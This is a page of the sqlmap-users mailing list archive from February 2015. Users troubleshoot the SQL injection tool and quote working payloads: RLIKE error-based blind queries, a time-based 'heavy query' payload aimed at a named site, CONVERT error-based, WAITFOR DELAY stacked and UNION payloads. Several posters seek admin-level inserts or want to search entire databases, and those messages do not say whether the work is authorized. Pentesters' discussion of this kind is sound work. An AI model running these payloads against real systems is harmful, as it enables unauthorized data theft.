sqlmap-users Mailing List for sqlmap (Page 14)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Bruno F. <ch...@ch...> - 2015-02-22 06:07:22
|
Hello everyone, I just started using sqlmap and it detects basic stuff fine so far (database, operative system, php version, ...) but when it comes to retrieving information I get a lot of garbage that I can't make sense of. An example of this 'garbage text' can be seen in the attached screenshot. For those wondering, this is for a security challenge (that is one of many things that happened as part of the computer science week in the university) and my final goal is to be able to list files in the server (and if they are out of the www folder, I should still be able to read them somehow). But my question is about all those strange characters that can be seen in the attached picture and how to convert them to something useful. Thank you, Bruno Ferreira |
|
From: Brandon P. <bpe...@gm...> - 2015-02-21 21:59:14
|
Right, in the sql statement where I select 'a', the ord of this is not greater than 112, and it fails as expected with parens not balanced.
The query below this that selects the first name from users should be functionally equivalent to select 'a' as mid is used to select the first character of the first username which is 'admin' as shown, but this statement does not fail as expected.
I am at a loss as to why the latter does not fail when the inner select is functionally equivalent to select 'a', and the former fails as expected.
I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table, and I logged into the server as root to try to figure out what the issue might be and this seems to be the root cause.
Sent from a phone
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi.
>
> Maybe I've mistaken, but you are looking this RLIKE wrong. Its function here (in your case) is to PROVOKE errors on False, and that's exactly what's going on here.
>
> In case of True, RLIKE is called with perfectly valid 0x7474747474, while in case of False its called with errorneous regexp 0x28 ('parentheses not balanced').
>
> Bye
>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...> wrote:
>> Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|
|
From: Miroslav S. <mir...@gm...> - 2015-02-21 21:36:03
|
Hi.
Maybe I've mistaken, but you are looking this RLIKE wrong. Its function
here (in your case) is to PROVOKE errors on False, and that's exactly
what's going on here.
In case of True, RLIKE is called with perfectly valid 0x7474747474, while
in case of False its called with errorneous regexp 0x28 ('parentheses not
balanced').
Bye
On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...>
wrote:
> Have an injection that I can use RLIKE to induce a 500 error, but it only
> works in some circumstances. Enumerating the DATABASE() value works, as
> well as the current user, but enumerating values from the database tables
> fails. Even as root on the box, the RLIKE query fails to throw an exception
> when attempting to use RLIKE in some instances.
>
> As you can see in the output below, the user can select the first name
> value from the users table (which is ‘admin’). When using RLIKE to test the
> first character returned with DATABASE() (a ‘p’), you get the parentheses
> not balanced exception as expected. You also get this exception when simply
> selecting ‘a’.
>
> But when you select the first row from the users table and grab the first
> character (an ‘a’), no exception is thrown and an empty result set is
> returned.
>
> Any thoughts?
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
> 0x7474747474 ELSE 0x28 END));
> Empty set (0.01 sec)
>
> mysql> SELECT `name` from users LIMIT 0,1;
> +-------+
> | name |
> +-------+
> | admin |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql>
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Brandon P. <bpe...@gm...> - 2015-02-21 19:22:00
|
Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances. As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’. But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned. Any thoughts? mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); Empty set (0.01 sec) mysql> SELECT `name` from users LIMIT 0,1; +-------+ | name | +-------+ | admin | +-------+ 1 row in set (0.00 sec) mysql> |
|
From: Loïc T. <lth...@gm...> - 2015-02-19 21:43:06
|
Oh nevermind, I was using an HTTP request loaded from a file, but using the -u parameter seems to work fine. Thanks anyway. 2015-02-19 22:38 GMT+01:00 Loïc THOMAS <lth...@gm...>: > Hi. > > SQLmap wouldn't detect an injection though manually it works perfectly. > It is on a post request. > > Using this value will display the page : > > id=75102' and (select user()) ='root@localhost' # > > Replacing 'root' by anything else won't work (except for the same in > uppercase, it seems the charset is case insensitive) > > I've tried --level 5, but without any success. > > This seems pretty simple to me, I mean it's just basically [int]' AND > [payload] [comment] > (Note that # is the only comment I've found working. -- or /* won't work). > > DBS is Mysql. I've tried that option too. > > Any idea on how to have this to work with sqlmap? > > > Regards, > > Loïc > |
|
From: Loïc T. <lth...@gm...> - 2015-02-19 21:38:08
|
Hi. SQLmap wouldn't detect an injection though manually it works perfectly. It is on a post request. Using this value will display the page : id=75102' and (select user()) ='root@localhost' # Replacing 'root' by anything else won't work (except for the same in uppercase, it seems the charset is case insensitive) I've tried --level 5, but without any success. This seems pretty simple to me, I mean it's just basically [int]' AND [payload] [comment] (Note that # is the only comment I've found working. -- or /* won't work). DBS is Mysql. I've tried that option too. Any idea on how to have this to work with sqlmap? Regards, Loïc |
|
From: Miroslav S. <mir...@gm...> - 2015-02-19 14:56:32
|
This has been replied earlier. That "bug" was "neutralized". Kind regards On Thu, Jan 29, 2015 at 10:23 AM, sad fastfood <sad...@ma...> wrote: > Hi! > Thanks for the greatest tool! > I've found some problem in latest revision of sqlmap. > If you will run something like: > *sqlmap.py -u "http://www.google.com/news.php?id=5+OR+(4=4 > <http://www.google.com/news.php?id=5+OR+(4=4>)" --skip-urlencode > --random-agent --tamper=space2plus --technique=BSU -v 3 --dbms=mssql* > And answer 'y' here: > > *[09:16:17] [WARNING] it appears that you have provided tainted parameter > values ('id=5 OR (4=4)') with most probably leftover chars/statements from > manual SQL injection test(s). Please, always use only valid parameter > values so sqlmap could be able to run properly are you really sure that you > want to continue (sqlmap could have problems)? [y/N]* > You'll get some output encoding problem: > > > > > *[Gw:bM:bw] [dLf4Q] ScuX1KRmE PXuhmWgc 'BBB.EXXE1c.jXg' [Gw:bM:NG] [T830] > hcuhRmE jXmmcjhRXm hX hPc hWSEch 4yt [Gw:bM:Nb] [dLf4Q] icj1WSci BcA sWEc > jPWSuch '9hI-2' [Gw:bM:Nb] [dLf4Q] EXh Hppo cSSXS jXic: FGG (fWi ycx9cuh) > [Gw:bM:Nb] [Zry8T8Q] hPc BcA ucSKcS ScusXmici BRhP Wm Hppo cSSXS jXic (FGG) > BPRjP jX91i RmhcSIcSc BRhP hPc Scu91hu XI hPc hcuhu* > > Printscreen attached. > In older versions(tested on something like november 2014 version) there is > no such a problem. > > And also: > checkWAF() function now calling every time you run sqlmap. But you really > don't need that. Because of this in case there is WAF you'll get timeout > every time you run sqlmap on the same target or may even get ip-ban. > I think old variant with --check-waf option is much better. > > Thank you! > > > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > > http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Marc A. C. A. <che...@ou...> - 2015-02-18 11:09:38
|
Hello. I wonder if SQLMAP support vulnerable sites to "Time-Based Blind SQL Injection using Heavy Queries" ??? For example: ////// informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers) ////// Are we may enter a database of a vulnerable site SQL Injection time-based by queries heavy as the example above using SQLMAP ??? Thank you to inform me please. |
|
From: a d. <deh...@gm...> - 2015-02-09 20:59:58
|
and when we use -C user_name does it search for User_name and User_Name column names ? On Tue, Feb 10, 2015 at 12:11 AM, a dehqan <deh...@gm...> wrote: > So to search in all tables for value "string" , i think the only way is to > use sp like this > http://blogs.lessthandot.com/index.php/DataMgmt/DataDesign/the-ten-most-asked-sql-server-questions--1/#2 > > But is it possible to craete it in sql shell ? > > Regards > > On Wed, Feb 4, 2015 at 7:29 PM, a dehqan <deh...@gm...> wrote: > >> how may i deploy this sp with sql shell ? >> http://pastebin.com/NtDWccp0 >> >> >> On Wed, Feb 4, 2015 at 7:10 PM, a dehqan <deh...@gm...> wrote: >> >>> this searchs in one table , How to say sql search in all tables (except >>> writting all tables one by one ) >>> >>> On Wed, Feb 4, 2015 at 7:06 PM, Brandon Perry <bpe...@gm... >>> > wrote: >>> >>>> You would be better off finding the most likely column to contain that >>>> value, then select from table where column = 'value' >>>> >>>> On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote: >>>> >>>>> Yes i think it's the way , >>>>> How may i search based on column value in all tables all columns ? >>>>> >>>>> >>>>> On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote: >>>>> >>>>>> try --sql-shell >>>>>> >>>>>> 2015-02-04 >>>>>> ------------------------------ >>>>>> is2reg >>>>>> ------------------------------ >>>>>> *发件人:*a dehqan <deh...@gm...> >>>>>> *发送时间:*2015-02-04 23:20 >>>>>> *主题:*Re: [sqlmap-users] Search based on fileds value >>>>>> *收件人:*"Brandon Perry"<bpe...@gm...> >>>>>> *抄送:*", sqlmap-users"<sql...@li...>,"Raymond"< >>>>>> ra...@te...> >>>>>> >>>>>> Thanks >>>>>> >>>>>> You mean first dump all databases and then search in files ? >>>>>> if yes i need a way without dumping all databases because database is >>>>>> huge ofcourse about 40 databases . >>>>>> >>>>>> And may i use --thread or any other option to make it faster ? >>>>>> >>>>>> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry < >>>>>> bpe...@gm...> wrote: >>>>>> >>>>>>> --dump then grep? >>>>>>> >>>>>>> >>>>>>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> >>>>>>> wrote: >>>>>>> >>>>>>>> Hi >>>>>>>> >>>>>>>> Guys , is there any way to search based on fileds value on sqlmap ? >>>>>>>> >>>>>>>> for exmample how to search in all databases for column with value >>>>>>>> of 1232434345 ? >>>>>>>> >>>>>>>> >>>>>>>> Regards >>>>>>>> >>>>>>>> >>>>>>>> ------------------------------------------------------------------------------ >>>>>>>> Dive into the World of Parallel Programming. The Go Parallel >>>>>>>> Website, >>>>>>>> sponsored by Intel and developed in partnership with Slashdot >>>>>>>> Media, is your >>>>>>>> hub for all things parallel software development, from weekly >>>>>>>> thought >>>>>>>> leadership blogs to news, videos, case studies, tutorials and more. >>>>>>>> Take a >>>>>>>> look and join the conversation now. >>>>>>>> http://goparallel.sourceforge.net/ >>>>>>>> _______________________________________________ >>>>>>>> sqlmap-users mailing list >>>>>>>> sql...@li... >>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>> >>>>>>>> >>>>>>> >>>>>>> >>>>>>> -- >>>>>>> http://volatile-minds.blogspot.com -- blog >>>>>>> http://www.volatileminds.net -- website >>>>>>> >>>>>> >>>>>> >>>>> >>>> >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>> >>> >> > |
|
From: a d. <deh...@gm...> - 2015-02-09 20:41:43
|
So to search in all tables for value "string" , i think the only way is to use sp like this http://blogs.lessthandot.com/index.php/DataMgmt/DataDesign/the-ten-most-asked-sql-server-questions--1/#2 But is it possible to craete it in sql shell ? Regards On Wed, Feb 4, 2015 at 7:29 PM, a dehqan <deh...@gm...> wrote: > how may i deploy this sp with sql shell ? > http://pastebin.com/NtDWccp0 > > > On Wed, Feb 4, 2015 at 7:10 PM, a dehqan <deh...@gm...> wrote: > >> this searchs in one table , How to say sql search in all tables (except >> writting all tables one by one ) >> >> On Wed, Feb 4, 2015 at 7:06 PM, Brandon Perry <bpe...@gm...> >> wrote: >> >>> You would be better off finding the most likely column to contain that >>> value, then select from table where column = 'value' >>> >>> On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote: >>> >>>> Yes i think it's the way , >>>> How may i search based on column value in all tables all columns ? >>>> >>>> >>>> On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote: >>>> >>>>> try --sql-shell >>>>> >>>>> 2015-02-04 >>>>> ------------------------------ >>>>> is2reg >>>>> ------------------------------ >>>>> *发件人:*a dehqan <deh...@gm...> >>>>> *发送时间:*2015-02-04 23:20 >>>>> *主题:*Re: [sqlmap-users] Search based on fileds value >>>>> *收件人:*"Brandon Perry"<bpe...@gm...> >>>>> *抄送:*", sqlmap-users"<sql...@li...>,"Raymond"< >>>>> ra...@te...> >>>>> >>>>> Thanks >>>>> >>>>> You mean first dump all databases and then search in files ? >>>>> if yes i need a way without dumping all databases because database is >>>>> huge ofcourse about 40 databases . >>>>> >>>>> And may i use --thread or any other option to make it faster ? >>>>> >>>>> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry < >>>>> bpe...@gm...> wrote: >>>>> >>>>>> --dump then grep? >>>>>> >>>>>> >>>>>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >>>>>> >>>>>>> Hi >>>>>>> >>>>>>> Guys , is there any way to search based on fileds value on sqlmap ? >>>>>>> >>>>>>> for exmample how to search in all databases for column with value of >>>>>>> 1232434345 ? >>>>>>> >>>>>>> >>>>>>> Regards >>>>>>> >>>>>>> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>>>>> sponsored by Intel and developed in partnership with Slashdot Media, >>>>>>> is your >>>>>>> hub for all things parallel software development, from weekly thought >>>>>>> leadership blogs to news, videos, case studies, tutorials and more. >>>>>>> Take a >>>>>>> look and join the conversation now. >>>>>>> http://goparallel.sourceforge.net/ >>>>>>> _______________________________________________ >>>>>>> sqlmap-users mailing list >>>>>>> sql...@li... >>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>> >>>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> http://volatile-minds.blogspot.com -- blog >>>>>> http://www.volatileminds.net -- website >>>>>> >>>>> >>>>> >>>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> > |
|
From: a d. <deh...@gm...> - 2015-02-09 20:38:31
|
So this admin user has not insert access , but how to be sure ? is there any command ? On Mon, Feb 9, 2015 at 7:35 PM, Miroslav Stampar <mir...@gm... > wrote: > You can't do that in sqlmap and I am pretty sure that it wouldn't suite > your needs too. > > Also, if there are other techniques available sqlmap will use it for sure > instead of stacking for data retrieval. That "statistical model..." message > just confused you. It is there so sqlmap would successfully run stacked > statements in the first place. Afterwards (after e.g. INSERT) it runs the > fastest available technique for data retrieval. > > Bye the way, result of INSERT statement is always NULL. Those are basics. > > Bye > On Feb 9, 2015 2:59 PM, "a dehqan" <deh...@gm...> wrote: > >> no I want stack query ,but not to use timebase injection detection as >> this use : >> >> id=6&rid=1'; WAITFOR DELAY '0:0:5'-- >> >> I want stack query with other kinds of detection . >> >> >> >> >> On Mon, Feb 9, 2015 at 3:49 PM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> Really not sure what are you trying to do. Do you want that >>> "error-based" query to be part of "stacked-query" or what? >>> >>> Bye >>> >>> On Mon, Feb 9, 2015 at 12:24 AM, a dehqan <deh...@gm...> wrote: >>> >>>> Maybe my question isn't clear , let me try again : >>>> >>>> I need to change stack query to not using timebase detection ? >>>> >>>> >>>> Sqlmap detect injection there by error base type too, like this : >>>> >>>> >>>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT >>>> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN >>>> (9622=9622) THEN CHAR(49) ELSE CHAR(48) >>>> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV >>>> >>>> How can i have this payload with type of stack query >>>> >>>> Regards >>>> >>>> On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote: >>>> >>>>> Guys is there any chance ? >>>>> >>>>> Thanks in advance >>>>> >>>>> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote: >>>>> >>>>>> I mean how may i have custom payload : >>>>>> >>>>>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT >>>>>> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN >>>>>> (9622=9622) THEN CHAR(49) ELSE CHAR(48) >>>>>> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV >>>>>> >>>>>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote: >>>>>> >>>>>>> Hi >>>>>>> >>>>>>> sqlmap gave me shell with injection type of stack queries ,but >>>>>>> Payload is like this : >>>>>>> >>>>>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'-- >>>>>>> >>>>>>> When i want insert with admin user sqlmap returns NULL and fails , >>>>>>> Only says this before trying : >>>>>>> >>>>>>> [WARNING] time-based comparison requires larger statistical model, >>>>>>> please wait.............................. >>>>>>> >>>>>>> Maybe i should change Payload , with what switch i can change >>>>>>> payload ? >>>>>>> >>>>>>> >>>>>>> Regards >>>>>>> >>>>>> >>>>>> >>>>> >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>> sponsored by Intel and developed in partnership with Slashdot Media, is >>>> your >>>> hub for all things parallel software development, from weekly thought >>>> leadership blogs to news, videos, case studies, tutorials and more. >>>> Take a >>>> look and join the conversation now. http://goparallel.sourceforge.net/ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> |
|
From: Miroslav S. <mir...@gm...> - 2015-02-09 16:21:06
|
No. One working UNION payload produced by yourself. Bye On Feb 9, 2015 5:14 PM, "Vojtěch Polášek" <kr...@gm...> wrote: > Hi, > thanks for your reply. > What do you mean by one working union payload? > Do you mean payload which causes sqlmap to report URL as being union > injectable? > Thank you very much, > Vojta > > > > > On 9.2.2015 13:23, Miroslav Stampar wrote: > > As Brandon said, one of columns could be "picky" about the "test" values > being used. We use either NULLs or integer values (e.g. 1) and this works > quite well in majority of situations (auto-casting and stuff). > > Also, there is a possibility that ORDER BY mechanism is triggering some > results, while the UNION query is not possible to achieve. I would suggest > you to find one working UNION payload and report back. > > Bye > > On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry <bpe...@gm...> > wrote: > >> The application could be requiring one of the columns to be in a certain >> format (perhaps a date, or serialized object) in order to be brought to the >> UI. Just sending and int/string or a NULL causes the SQL query to succeed, >> but the app throws an error due to the data not being formatted as expected. >> >> On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> >> wrote: >> >>> Greetings, >>> I am doing some pentesting for a corporation. >>> I am testing some GET parameter of their web application and I encounter >>> a strange issue. >>> The URL seems to be injectable as sqlmap states, but at the end it says >>> that it is not injectable. >>> Here is a link to the log with verbosity level 3. Due to confidentiality >>> reasons, I can't provide you with actual requests or responses. >>> >>> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae >>> What might be the problem? >>> I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of >>> Arch Linux. >>> Thank you very much for your opinions, >>> Vojta >>> >>> >>> ------------------------------------------------------------------------------ >>> Dive into the World of Parallel Programming. The Go Parallel Website, >>> sponsored by Intel and developed in partnership with Slashdot Media, is >>> your >>> hub for all things parallel software development, from weekly thought >>> leadership blogs to news, videos, case studies, tutorials and more. Take >>> a >>> look and join the conversation now. http://goparallel.sourceforge.net/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> Dive into the World of Parallel Programming. The Go Parallel Website, >> sponsored by Intel and developed in partnership with Slashdot Media, is >> your >> hub for all things parallel software development, from weekly thought >> leadership blogs to news, videos, case studies, tutorials and more. Take a >> look and join the conversation now. http://goparallel.sourceforge.net/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Brandon P. <bpe...@gm...> - 2015-02-09 16:20:09
|
A UNION payload that shows some bit of data that you expect in the response. For instance, perhaps the first column in the union is expected to be a UUID, and the third column is given back in the response. UNION SELECT '2403db44-b077-11e4-b0e1-000c29133bd7', NULL, 0x6664736166647361, NULL If that payload were to succeed, 'fdsafdsa' would appear in the response. Figure out how to at least inject with a known payload and report back. :) On Mon, Feb 9, 2015 at 10:13 AM, Vojtěch Polášek <kr...@gm...> wrote: > Hi, > thanks for your reply. > What do you mean by one working union payload? > Do you mean payload which causes sqlmap to report URL as being union > injectable? > Thank you very much, > Vojta > > > > > > On 9.2.2015 13:23, Miroslav Stampar wrote: > > As Brandon said, one of columns could be "picky" about the "test" values > being used. We use either NULLs or integer values (e.g. 1) and this works > quite well in majority of situations (auto-casting and stuff). > > Also, there is a possibility that ORDER BY mechanism is triggering some > results, while the UNION query is not possible to achieve. I would suggest > you to find one working UNION payload and report back. > > Bye > > On Mon, Feb 9, 2015 at 12:08 AM, Brandon Perry <bpe...@gm...> > wrote: > >> The application could be requiring one of the columns to be in a certain >> format (perhaps a date, or serialized object) in order to be brought to the >> UI. Just sending and int/string or a NULL causes the SQL query to succeed, >> but the app throws an error due to the data not being formatted as expected. >> >> On Sun, Feb 8, 2015 at 4:08 PM, Vojtěch Polášek <kr...@gm...> >> wrote: >> >>> Greetings, >>> I am doing some pentesting for a corporation. >>> I am testing some GET parameter of their web application and I encounter >>> a strange issue. >>> The URL seems to be injectable as sqlmap states, but at the end it says >>> that it is not injectable. >>> Here is a link to the log with verbosity level 3. Due to confidentiality >>> reasons, I can't provide you with actual requests or responses. >>> >>> http://cloud.vojtapolasek.eu/public.php?service=files&t=2c68ef52ac55edb53770c9d5be403bae >>> What might be the problem? >>> I am running Sqlmap 1.0dev-nongit-20150111 from Blackarch repository of >>> Arch Linux. >>> Thank you very much for your opinions, >>> Vojta >>> >>> >>> ------------------------------------------------------------------------------ >>> Dive into the World of Parallel Programming. The Go Parallel Website, >>> sponsored by Intel and developed in partnership with Slashdot Media, is >>> your >>> hub for all things parallel software development, from weekly thought >>> leadership blogs to news, videos, case studies, tutorials and 